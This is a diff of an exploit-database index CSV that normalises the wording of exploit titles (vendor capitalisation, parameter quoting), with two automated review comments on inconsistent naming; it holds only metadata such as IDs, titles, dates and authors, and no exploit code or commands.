12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - str_transliterate() Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0
12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0
20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - whatsnew.txt SEH (Metasploit)",2010-04-16,blake,windows,local,0
12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' SEH (Metasploit)",2010-04-16,blake,windows,local,0
12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0
12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0
12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0
@ -6388,7 +6388,7 @@ id,file,description,date,author,platform,type,port
14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0
14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0
14046,platforms/windows/local/14046.py,"FieldNotes 32 5.0 - Buffer Overflow (SEH)",2010-06-25,TecR0c,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 - Local Buffer Overflow (Windows 7 ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
14068,platforms/windows/local/14068.py,"Winamp 5.572 (Windows 7) - Local Buffer Overflow (ASLR + DEP Bypass)",2010-06-26,Node,windows,local,0
14077,platforms/windows/local/14077.rb,"BlazeDVD 6.0 - Buffer Overflow (Metasploit)",2010-06-27,blake,windows,local,0
14081,platforms/windows/local/14081.pl,"RM Downloader 3.1.3 - Buffer Overflow (SEH)",2010-06-27,Madjix,windows,local,0
14098,platforms/windows/local/14098.py,"GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH)",2010-06-28,chap0,windows,local,0
@ -6484,7 +6484,7 @@ id,file,description,date,author,platform,type,port
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"NullSoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
@ -7954,7 +7954,7 @@ id,file,description,date,author,platform,type,port
27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0
27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0
27874,platforms/windows/local/27874.py,"WinAmp 5.63 - (winamp.ini) Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Exploit",2013-08-26,"Ayman Sagy",windows,local,0
27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3)",2013-08-29,Metasploit,linux,local,0
27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0
27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0
@ -7986,7 +7986,7 @@ id,file,description,date,author,platform,type,port
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,legalhackers,linux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@ -11199,8 +11199,8 @@ id,file,description,date,author,platform,type,port
19094,platforms/windows/remote/19094.txt,"Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing and Cross Frame Access",1999-04-22,"Georgi Guninsky",windows,remote,0
19096,platforms/linux/remote/19096.c,"RedHat Linux 5.1 & Caldera OpenLinux Standard 1.2 - Mountd",1998-08-28,LucySoft,linux,remote,0
19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure (Metasploit)",2012-06-13,Metasploit,hardware,remote,0
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 / TriTeal TED CDE 4.3 / Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (1)",1998-08-31,"NAI research team",unix,remote,0
19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1 - ToolTalk RPC Service Overflow (2)",1998-08-31,"NAI research team",unix,remote,0
19103,platforms/linux/remote/19103.c,"HP HP-UX 10.34 / Microsoft Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3 - Denial of Service",1997-11-13,"G P R",linux,remote,0
40434,platforms/php/remote/40434.rb,"FreePBX < 13.0.188 - Remote Command Execution (Metasploit)",2016-09-27,0x4148,php,remote,0
19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware 7.1.1 & SGI IRIX 5.3 & Sun Solaris 2.5.1 - Exploit",1997-11-24,anonymous,linux,remote,0
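Review bot: The replacement titles for 19101 and 19102 (the second pair of rows) join three separate products with a bare slash, "Xi Graphics Maximum CDE 1.2.3/TriTeal TED CDE 4.3/Sun Solaris 2.5.1", which is the same punctuation the neighbouring 19103 row uses for a list of versions of one product ("NT 3.5.1 SP1/NT 3.5.1 SP2/..."), while 19103 separates distinct products with " / ". Suggest keeping the spaced " / " between products so that splitting a title on " / " still yields one product per field.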
@ -11856,7 +11856,7 @@ id,file,description,date,author,platform,type,port
20817,platforms/windows/remote/20817.c,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (3)",2005-02-02,styx,windows,remote,0
20818,platforms/windows/remote/20818.txt,"Microsoft IIS 5.0 - '.printer' ISAPI Extension Buffer Overflow (4)",2001-05-01,"Cyrus The Great",windows,remote,0
20819,platforms/windows/remote/20819.txt,"BRS Webweaver 0.x - FTP Root Full Path Disclosure",2001-04-28,joetesta,windows,remote,0
20820,platforms/windows/remote/20820.c,"Nullsoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
20820,platforms/windows/remote/20820.c,"NullSoft Winamp 2.x - AIP Buffer Overflow",2001-04-29,byterage,windows,remote,0
20825,platforms/windows/remote/20825.txt,"Michael Lamont Savant HTTP Server 2.1 - Directory Traversal",2001-02-17,"Tom Tom",windows,remote,0
20826,platforms/windows/remote/20826.txt,"Jason Rahaim MP3Mystic 1.0.x - Server Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
20829,platforms/windows/remote/20829.txt,"T. Hauck Jana Server 1.45/1.46 - Hex Encoded Directory Traversal",2001-05-07,neme-dhc,windows,remote,0
@ -12968,7 +12968,7 @@ id,file,description,date,author,platform,type,port
24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0
24567,platforms/multiple/remote/24567.txt,"Oracle Database Server 8.1.7/9.0.x - ctxsys.driload Access Validation",2004-09-03,"Alexander Kornbrust",multiple,remote,0
24568,platforms/windows/remote/24568.html,"Grokster 1.3/2.6 / KaZaA Media Desktop 1.3.x/1.6.1/2.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24571,platforms/windows/remote/24571.html,"Nullsoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24571,platforms/windows/remote/24571.html,"NullSoft Winamp 2.x/3.x/5.0.x - ActiveX Control Remote Buffer Overflow",2004-09-03,celebrityhacker,windows,remote,0
24572,platforms/windows/remote/24572.pl,"Ipswitch WhatsUp Gold 7.0/8.0 - Notification Instance Name Remote Buffer Overflow",2004-09-03,anonymous,windows,remote,0
24720,platforms/windows/remote/24720.txt,"Microsoft Internet Explorer 6 - IFRAME Status Bar URI Obfuscation",2004-11-02,"Benjamin Tobias Franz",windows,remote,0
24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 - Staffile Information Disclosure",2004-09-07,masud_libra,multiple,remote,0
@ -13071,7 +13071,7 @@ id,file,description,date,author,platform,type,port
25190,platforms/multiple/remote/25190.txt,"ca3de - Multiple Vulnerabilities",2005-03-03,"Luigi Auriemma",multiple,remote,0
25191,platforms/multiple/remote/25191.txt,"JoWood Chaser 1.0/1.50 - Remote Buffer Overflow",2005-03-07,"Luigi Auriemma",multiple,remote,0
25194,platforms/windows/remote/25194.txt,"Hosting Controller 1.x/6.1 - Multiple Information Disclosure Vulnerabilities",2005-03-07,"small mouse",windows,remote,0
29277,platforms/windows/remote/29277.txt,"winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
29277,platforms/windows/remote/29277.txt,"Winamp Web interface 7.5.13 - Multiple Vulnerabilities",2006-12-11,"Luigi Auriemma",windows,remote,0
24999,platforms/windows/remote/24999.py,"Light HTTPD 0.1 (Windows) - Buffer Overflow",2013-04-25,"Jacob Holcomb",windows,remote,0
25294,platforms/windows/remote/25294.rb,"Microsoft Internet Explorer - CGenericElement Object Use-After-Free (Metasploit)",2013-05-07,Metasploit,windows,remote,0
25001,platforms/linux/remote/25001.rb,"GroundWork - monarch_scan.cgi OS Command Injection (Metasploit)",2013-04-25,Metasploit,linux,remote,0
@ -13234,7 +13234,7 @@ id,file,description,date,author,platform,type,port
25986,platforms/php/remote/25986.txt,"Plesk < 9.5.4 - Remote Exploit",2013-06-05,kingcope,php,remote,0
25987,platforms/hardware/remote/25987.txt,"Xpient - Cash Drawer Operation",2013-06-05,"Core Security",hardware,remote,0
25988,platforms/multiple/remote/25988.txt,"Oracle9i Application Server 9.0.2 - MOD_ORADAV Access Control",2003-02-13,"David Litchfield",multiple,remote,0
25989,platforms/windows/remote/25989.txt,"Nullsoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
25989,platforms/windows/remote/25989.txt,"NullSoft Winamp 5.0 - Malformed ID3v2 Tag Buffer Overflow",2005-07-15,"Leon Juranic",windows,remote,0
25999,platforms/windows/remote/25999.rb,"Microsoft Internet Explorer - textNode Use-After-Free (Metasploit)",2013-06-07,"Scott Bell",windows,remote,0
26002,platforms/multiple/remote/26002.txt,"Oracle Reports Server 6.0.8/9.0.x - XML File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
26003,platforms/multiple/remote/26003.txt,"Oracle Reports Server 6.0.8/9.0.x - Arbitrary File Disclosure",2005-07-19,"Alexander Kornbrust",multiple,remote,0
@ -17705,7 +17705,7 @@ id,file,description,date,author,platform,type,port
4238,platforms/php/webapps/4238.txt,"Adult Directory - 'cat_id' SQL Injection",2007-07-27,t0pP8uZz,php,webapps,0
4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 - (comments_get.asp id) SQL Injection",2007-07-28,g00ns,asp,webapps,0
4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites - 'category.php cat' SQL Injection",2007-07-28,t0pP8uZz,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - (new_images.php) Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA 1.3.1 - 'new_images.php' Blind SQL Injection",2007-07-29,EgiX,php,webapps,0
4246,platforms/php/webapps/4246.txt,"wolioCMS - Authentication Bypass / SQL Injection",2007-07-30,k1tk4t,php,webapps,0
4248,platforms/php/webapps/4248.txt,"Joomla! Component com_gmaps 1.00 - (mapId) SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
4253,platforms/php/webapps/4253.pl,"paBugs 2.0 Beta 3 - (main.php cid) SQL Injection",2007-08-02,uimp,php,webapps,0
@ -17782,7 +17782,7 @@ id,file,description,date,author,platform,type,port
4395,platforms/php/webapps/4395.txt,"NuclearBB Alpha 2 - 'ROOT_PATH' Remote File Inclusion",2007-09-11,"Rootshell Security",php,webapps,0
4396,platforms/php/webapps/4396.txt,"X-Cart - Multiple Remote File Inclusion",2007-09-11,aLiiF,php,webapps,0
4397,platforms/php/webapps/4397.rb,"WordPress 1.5.1.1 <= 2.2.2 - Multiple Vulnerabilities",2007-09-14,"Lance M. Havok",php,webapps,0
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' SQL Injection",2007-09-13,Houssamix,php,webapps,0
4400,platforms/php/webapps/4400.txt,"KwsPHP Module jeuxflash 1.0 - 'id' Parameter SQL Injection",2007-09-13,Houssamix,php,webapps,0
4401,platforms/php/webapps/4401.txt,"Joomla! Component Joomlaradio 5.0 - Remote File Inclusion",2007-09-13,Morgan,php,webapps,0
4404,platforms/php/webapps/4404.txt,"GForge < 4.6b2 - (skill_delete) SQL Injection",2007-09-13,"Sumit Siddharth",php,webapps,0
4405,platforms/php/webapps/4405.txt,"Ajax File Browser 3b - (settings.inc.php approot) Remote File Inclusion",2007-09-14,"arfis project",php,webapps,0
@ -17872,7 +17872,7 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 - client.php Remote File Inclusion",2007-10-11,S.W.A.T.,php,webapps,0
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - 'index.php' Remote File Inclusion",2007-10-11,0in,php,webapps,0
4521,platforms/php/webapps/4521.txt,"Joomla! Component Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection",2007-10-11,s4mi,php,webapps,0
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Module Newsletter - SQL Injection",2007-10-11,s4mi,php,webapps,0
4524,platforms/php/webapps/4524.txt,"Joomla! Component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0
4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0
@ -18453,45 +18453,45 @@ id,file,description,date,author,platform,type,port
5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
5345,platforms/php/webapps/5345.txt,"Joomla! Component OnlineFlashQuiz 1.0.2 - Remote File Inclusion",2008-04-02,NoGe,php,webapps,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - (prefixdir) Local File Inclusion",2008-04-02,w0cker,php,webapps,0
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - (PATH_TO_CODE) Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
5350,platforms/php/webapps/5350.txt,"KwsPHP Module Galerie - (id_gal) SQL Injection",2008-04-03,S@BUN,php,webapps,0
5351,platforms/php/webapps/5351.txt,"KwsPHP Module Archives - 'id' SQL Injection",2008-04-03,S@BUN,php,webapps,0
5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash (cat) 1.0 - SQL Injection",2008-04-03,Houssamix,php,webapps,0
5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto - (C_ID) SQL Injection",2008-04-03,Stack,php,webapps,0
5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - (reed) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5360,platforms/php/webapps/5360.txt,"sabros.us 1.75 - (thumbnails.php) Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
5362,platforms/php/webapps/5362.txt,"Comdev News Publisher - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - (photo_id) SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - (incl_page) Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - (getdata.php id) Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - (id_art) SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - (lng) Local File Inclusion",2008-04-04,w0cker,php,webapps,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 - 'prefixdir' Parameter Local File Inclusion",2008-04-02,w0cker,php,webapps,0
5348,platforms/php/webapps/5348.txt,"PhpBlock a8.4 - 'PATH_TO_CODE' Parameter Remote File Inclusion",2008-04-02,w0cker,php,webapps,0
5350,platforms/php/webapps/5350.txt,"KwsPHP 1.3.456 Module Galerie - 'id_gal' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
5351,platforms/php/webapps/5351.txt,"KwsPHP 1.3.456 Module Archives - 'id' Parameter SQL Injection",2008-04-03,S@BUN,php,webapps,0
5352,platforms/php/webapps/5352.txt,"KwsPHP Module jeuxflash 1.0 - 'cat' Parameter SQL Injection",2008-04-03,Houssamix,php,webapps,0
5353,platforms/php/webapps/5353.txt,"KwsPHP Module ConcoursPhoto 2.0 - 'C_ID' Parameter SQL Injection",2008-04-03,Stack,php,webapps,0
5358,platforms/php/webapps/5358.pl,"XPOZE Pro 3.05 - 'reed' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5359,platforms/php/webapps/5359.txt,"Vastal I-Tech Software Zone - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5360,platforms/php/webapps/5360.txt,"Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure",2008-04-04,HaCkeR_EgY,php,webapps,0
5362,platforms/php/webapps/5362.txt,"Comdev News Publisher 4.1.2 - SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5363,platforms/php/webapps/5363.txt,"Affiliate Directory - 'cat_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5364,platforms/php/webapps/5364.txt,"PHP Photo Gallery 1.0 - 'photo_id' Parameter SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5365,platforms/php/webapps/5365.txt,"Blogator-script 0.95 - 'incl_page' Parameter Remote File Inclusion",2008-04-04,JIKO,php,webapps,0
5367,platforms/php/webapps/5367.pl,"PIGMy-SQL 1.4.1 - 'getdata.php' Blind SQL Injection",2008-04-04,t0pP8uZz,php,webapps,0
5368,platforms/php/webapps/5368.txt,"Blogator-script 0.95 - 'id_art' Parameter SQL Injection",2008-04-04,"Virangar Security",php,webapps,0
5369,platforms/php/webapps/5369.txt,"Dragoon 0.1 - 'lng' Parameter Local File Inclusion",2008-04-04,w0cker,php,webapps,0
5370,platforms/php/webapps/5370.txt,"Blogator-script 0.95 - Change User Password",2008-04-05,"Virangar Security",php,webapps,0
5371,platforms/php/webapps/5371.txt,"Entertainment Directory 1.1 - SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php forum' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5373,platforms/asp/webapps/5373.txt,"CoBaLT 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5372,platforms/php/webapps/5372.txt,"Easynet Forum Host - 'forum.php' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5373,platforms/asp/webapps/5373.txt,"Cobalt 0.1 - Multiple SQL Injections",2008-04-05,U238,asp,webapps,0
5374,platforms/php/webapps/5374.txt,"Gaming Directory 1.0 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5375,platforms/php/webapps/5375.txt,"visualpic 0.3.1 - Remote File Inclusion",2008-04-05,Cr@zy_King,php,webapps,0
5376,platforms/php/webapps/5376.pl,"Picture Rating 1.0 - Blind SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5377,platforms/php/webapps/5377.txt,"Links Directory 1.1 - 'cat_id' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5378,platforms/php/webapps/5378.txt,"Software Index 1.1 - 'cid' Parameter SQL Injection",2008-04-05,t0pP8uZz,php,webapps,0
5379,platforms/php/webapps/5379.txt,"MyBB Plugin Custom Pages 1.0 - SQL Injection",2008-04-06,Lidloses_Auge,php,webapps,0
5380,platforms/php/webapps/5380.txt,"Blog PixelMotion - 'sauvBase.php' Arbitrary Database Backup",2008-04-06,JIKO,php,webapps,0
5381,platforms/php/webapps/5381.txt,"Blog PixelMotion - 'modif_config.php' Arbitrary File Upload",2008-04-06,JIKO,php,webapps,0
5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'index.php categorie' SQL Injection",2008-04-06,parad0x,php,webapps,0
5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' SQL Injection",2008-04-06,S@BUN,php,webapps,0
5382,platforms/php/webapps/5382.txt,"Blog PixelMotion - 'categorie' Parameter SQL Injection",2008-04-06,parad0x,php,webapps,0
5383,platforms/php/webapps/5383.txt,"Site Sift Listings - 'id' Parameter SQL Injection",2008-04-06,S@BUN,php,webapps,0
5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats",2008-04-06,t0pP8uZz,php,webapps,0
5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum.php forum' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service - 'forum' Parameter SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User",2008-04-06,t0pP8uZz,php,webapps,0
5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users",2008-04-06,t0pP8uZz,php,webapps,0
5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 - 'id' SQL Injection",2008-04-06,t0pP8uZz,php,webapps,0
5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - (project) SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers - 'project' Parameter SQL Injection",2008-04-07,t0pP8uZz,php,webapps,0
5391,platforms/php/webapps/5391.php,"Drake CMS 0.4.11 - Blind SQL Injection",2008-04-07,EgiX,php,webapps,0
5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 - (maps plugin) Remote Command Execution",2008-04-07,EgiX,php,webapps,0
5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - (root) Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
5392,platforms/php/webapps/5392.php,"LinPHA 1.3.3 Plugin Maps - Remote Command Execution",2008-04-07,EgiX,php,webapps,0
5393,platforms/php/webapps/5393.txt,"Dragoon 0.1 - 'root' Parameter Remote File Inclusion",2008-04-07,RoMaNcYxHaCkEr,php,webapps,0
5394,platforms/php/webapps/5394.txt,"Mole 2.1.0 - (viewsource.php) Remote File Disclosure",2008-04-07,GoLd_M,php,webapps,0
5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php) File Disclosure",2008-04-07,Stack,php,webapps,0
5400,platforms/php/webapps/5400.txt,"724CMS 4.01 Enterprise - (index.php ID) SQL Injection",2008-04-07,Lidloses_Auge,php,webapps,0
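Review bot: The old "'file.php param'" titles are rewritten three different ways in this hunk: 5372 becomes 'forum.php' with the parameter name dropped, 5385 (same old form, 'forum.php forum') becomes 'forum' Parameter with the file name dropped, and 5367 goes from (getdata.php id) to 'getdata.php' and loses 'id' entirely. The parameter name is the detail a defender greps this index for, so suggest one rule for all three, keeping both the file and the parameter. Also note that 5389 ("Prozilla Cheat Script 2.0 - 'id' SQL Injection") and 5394/5399/5400 are left in the old style as context lines even though the rows around them were normalised.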
@ -19153,7 +19153,7 @@ id,file,description,date,author,platform,type,port
6189,platforms/php/webapps/6189.txt,"GreenCart PHP Shopping Cart - 'id' SQL Injection",2008-08-01,"Hussin X",php,webapps,0
6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple SQL Injections",2008-08-01,cOndemned,php,webapps,0
6191,platforms/php/webapps/6191.txt,"e-vision CMS 2.02 - (SQL Injection / Arbitrary File Upload / Information Gathering) Multiple Vulnerabilities",2008-08-02,"Khashayar Fereidani",php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0
6192,platforms/php/webapps/6192.txt,"k-links directory - SQL Injection / Cross-Site Scripting",2008-08-02,Corwin,php,webapps,0
6193,platforms/php/webapps/6193.txt,"E-Store Kit-1 <= 2 PayPal Edition - 'pid' SQL Injection",2008-08-02,Mr.SQL,php,webapps,0
6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 - 'download.php' Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0
6199,platforms/php/webapps/6199.pl,"Joomla! Component EZ Store Remote - Blind SQL Injection",2008-08-03,His0k4,php,webapps,0
@ -19193,7 +19193,7 @@ id,file,description,date,author,platform,type,port
6260,platforms/php/webapps/6260.txt,"cyberBB 0.6 - Multiple SQL Injections",2008-08-18,cOndemned,php,webapps,0
6261,platforms/php/webapps/6261.txt,"PHP live helper 2.0.1 - Multiple Vulnerabilities",2008-08-18,"GulfTech Security",php,webapps,0
6269,platforms/cgi/webapps/6269.txt,"TWiki 4.2.0 - (configure) Remote File Disclosure",2008-08-19,Th1nk3r,cgi,webapps,0
